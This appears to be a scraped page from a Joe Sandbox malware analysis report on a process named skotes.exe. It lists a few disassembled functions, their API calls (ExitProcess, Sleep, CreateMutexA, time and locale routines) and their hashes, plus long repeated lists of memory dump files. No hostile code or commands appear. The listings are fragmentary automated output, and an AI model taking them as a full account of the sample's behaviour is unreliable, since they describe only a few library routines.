Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 5c3d65db8751ba17445fcb1787d165ded7d679a84cf395d7f5a8d2003cfae295
Instruction ID: ff67522a08937435a8a55695b149d02fc572c86e0c9c8ba664eee9b9bf842f70
Opcode Fuzzy Hash: 5c3d65db8751ba17445fcb1787d165ded7d679a84cf395d7f5a8d2003cfae295
Instruction Fuzzy Hash: 4AA104B0A41609DFDF11EF68D948B5AB7B8FF14B20F048129E815D7241EB39EA05CBD1

Function 0079BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0079BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 0079BBE4
_xtime_get.LIBCPMT ref: 0079BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 0079BC13

Memory Dump Source

Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 1d1671a99f061aa4e79fa56e415a2d43dfbd4e8e63dab465840c66a8ba2240e3
Instruction ID: 0353687fc318050c3c4c9c49816dd2f58225c7543bd1bafa4354c0ae6a7fb851
Opcode Fuzzy Hash: 1d1671a99f061aa4e79fa56e415a2d43dfbd4e8e63dab465840c66a8ba2240e3
Instruction Fuzzy Hash: F1213272A01119EFDF01EFA4ED859BEB7B9EF09710F104015F501B7291DB38AD019BA0

Function 007BF35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 007BF3A3

Strings

`'~, xrefs: 007BF375
8"~, xrefs: 007BF44B

Memory Dump Source

Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"~$`'~
API String ID: 3903695350-10081231
Opcode ID: ca93e78b4ff8da7b16310ce28ffad3d6c9d157592c633bfaf2fa6875f1990475
Instruction ID: 57ce17a0b5eb027aa8e997ea0ce86c989c2f93aa9d63570e0661dc64cbfde434
Opcode Fuzzy Hash: ca93e78b4ff8da7b16310ce28ffad3d6c9d157592c633bfaf2fa6875f1990475
Instruction Fuzzy Hash: 58313931600646EFEB21AA39DC49BDBB3E8EF00752F14442AE459D7599DF79AC80CB21

Analysis Process: skotes.exePID: 2884, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1936
Total number of Limit Nodes:	11

Executed Functions

Function 007B652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,007B652A,?,?,?,?,?,007B7661), ref: 007B6567

Memory Dump Source

Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5b16228ced527161ca9bf63de6270444d0520dd7dcad59064328e8bee2275421
Instruction ID: c4c7f5eb229261c857f0cfc4e48fcf964375b68845458a552cc207850aecbf09
Opcode Fuzzy Hash: 5b16228ced527161ca9bf63de6270444d0520dd7dcad59064328e8bee2275421
Instruction Fuzzy Hash: 5BE08C30041208AECF36BB18D85EBCC3B69EF12741F000810FE1886226CB2DEEA1CA80

Function 00789BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2~
API String ID: 1464230837-3459864372
Opcode ID: cace8c0511ab53ec016aadead3cf8e81e0f18f55c250242f826db9f1d9421dc0
Instruction ID: 43c2776c56c10fe45beaa033e921b363b966e3343164a2579f81dd04d5c60503
Opcode Fuzzy Hash: cace8c0511ab53ec016aadead3cf8e81e0f18f55c250242f826db9f1d9421dc0
Instruction Fuzzy Hash: B3316A71744204DBFB08BB78EC8D7ADBB62EB95310F648219E114973D6D73E59808762

Function 00789F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2~
API String ID: 1464230837-3459864372
Opcode ID: 4514d41d281868b654f0aa6664d9f340fa58829e54316e0f37c80045bf8c3dc0
Instruction ID: 580c6b885d88983c9092b8d9ee2e03d3bc0e0dd9cbab514d35d393d4f8cfa093
Opcode Fuzzy Hash: 4514d41d281868b654f0aa6664d9f340fa58829e54316e0f37c80045bf8c3dc0
Instruction Fuzzy Hash: 02316A31744104EBFB18BBB8DC8C7ADB762EB85310F24861AE158E72D1D73D59808712

Function 0078A079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
